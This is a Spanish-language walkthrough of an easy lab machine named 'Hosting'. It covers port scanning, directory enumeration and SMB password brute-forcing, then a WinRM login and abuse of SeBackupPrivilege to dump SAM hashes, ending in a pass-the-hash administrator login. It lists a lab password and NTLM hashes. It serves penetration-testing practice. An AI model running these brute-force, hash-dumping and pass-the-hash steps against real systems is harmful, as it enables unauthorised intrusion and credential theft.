Hosting

🔍 Dificultad: Fácil

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 192.168.1.76

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap -p- --open 192.168.1.76 --min-rate 5000 -n

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo, los puertos 80, 135, 139, 445 y varios en el rango 49664-49670 están abiertos. Estos pertenecen a los servicios de HTTP, Microsoft RPC, NetBIOS-SSN, Microsoft-DS y otros puertos desconocidos, por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p80,135,139,445 -v 192.168.1.76

para obtener más información sobre ese puerto específicamente.

Revisamos el puerto 80.

Revisamos directorios.

gobuster dir -u http://192.168.1.76 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml

Encontramos el directorio /speed.

Adjuntamos el dominio a /etc/hosts.

🚀 EXPLOTACIÓN

Hacemos una lista de usuarios para realizar fuerza bruta.

nxc smb 192.168.1.76 -u usuarios -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding

Listamos recursos compartidos. Pero no encontramos nada relevante.

Listamos usuarios.

Vemos que con m.davis tenemos su contraseña.

Comprobamos que j.wilson tiene la misma contraseña. Nos conectamos con evil-winrm.

evil-winrm -i 192.168.1.76 -u j.wilson -p 'H0$T1nG123!'

🔐 PRIVILEGIOS

whoami

Dado que el sistema cuenta con el permiso SeBackupPrivilege, es posible realizar una copia de los archivos SAM y SYSTEM para extraer los hashes de las credenciales.

Nos la descargamos.

*Evil-WinRM* PS C:\temp> download system                                   
Info: Downloading C:\temp\system to system                                      
Info: Download successful!

*Evil-WinRM* PS C:\temp> download sam                                       
Info: Downloading C:\temp\sam to sam                                     
Info: Download successful!

Extraemos los hashes.

samdump2 system sam > hashes.txt

Ahora con John los crackeamos.

Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:8afe1e889d0977f8571b3dc0524648aa:::
administrator:1002:aad3b435b51404eeaad3b435b51404ee:41186fb28e283ff758bb3dbeb6fb4a5c:::
p.smith:1003:aad3b435b51404eeaad3b435b51404ee:2cf4020e126a3314482e5e87a3f39508:::
f.miller:1004:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
m.davis:1005:aad3b435b51404eeaad3b435b51404ee:851699978beb72d9b0b820532f74de8d:::
j.wilson:1006:aad3b435b51404eeaad3b435b51404ee:a6cf5ad66b08624854e80a8786ad6bac:::

Nos conectamos. Ya somos root.

evil-winrm -i 192.168.1.76 -u administrator -H 41186fb28e283ff758bb3dbeb6fb4a5c